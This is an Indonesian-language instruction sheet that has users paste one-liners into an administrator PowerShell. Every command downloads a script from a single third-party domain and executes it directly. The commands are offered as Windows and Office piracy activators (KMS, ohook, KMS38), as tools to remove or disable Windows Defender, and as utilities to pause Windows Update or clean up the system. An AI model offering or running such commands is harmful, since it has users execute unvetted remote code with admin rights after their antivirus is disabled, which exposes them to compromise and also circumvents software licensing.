
-------------------------------------------------------------------------------------
Buka powershell (admin) / Terminal (admin) atau dengan cara klik kanan logo windows
lalu pilih Powershell (admin) / Terminal (Admin)
kemudian copy text di bawah ini dari irm sampai iex lalu paste di powershell lalu tekan enter
-------------------------------------------------------------------------------------
# Activator Windows & Office Manual
irm hinzdc.xyz/get/active | iex

# Activator Windows & Office Otomatis Active Permanent
irm hinzdc.xyz/get/activeauto | iex

# Activator Windows Permanent Digital License
irm hinzdc.xyz/get/activewindows | iex

# Activator Office 2010, 2013, 2016, 2019, 2021 - KMS Online
irm hinzdc.xyz/get/activeofficekms | iex

# Activator Office 2010, 2013, 2016, 2019, 2021 - ohook Permanent
irm hinzdc.xyz/get/activeofficehook | iex

# Activator Windows sampai tahun 2038 - KMS38
irm hinzdc.xyz/get/activewindowskms38 | iex

------------------------------------------------------------------
# Force Remove - Hapus Paksa File Dan Folder Yang Sulit Di Hapus
irm hinzdc.xyz/get/ForceRemove | iex

# Remove or Disable Windows Defender (Disable dulu defender sebelum memasukan perintah ini)
irm hinzdc.xyz/get/def | iex
irm hinzdc.xyz/get/def2 | iex

# Fix corrupted file system & restore health
irm hinzdc.xyz/get/fixos | iex

# Office Scrub / Uninstal dan Force Remove
irm hinzdc.xyz/get/officescrub | iex
irm hinzdc.xyz/get/officescrubber | iex

# Pause Windows Update Sampai Tahun 3000
irm hinzdc.xyz/get/pausewu | iex

iex(irm hinzdc.xyz/get/resetwindowupdate)
iex(irm hinzdc.xyz/get/viruswindows)
iex(irm hinzdc.xyz/get/installoffice)
iex(irm hinzdc.xyz/get/infectorcheck)
iex(irm hinzdc.xyz/get/amdsupport)
iex(irm hinzdc.xyz/get/gpeditenable)
iex(irm hinzdc.xyz/get/blockhost)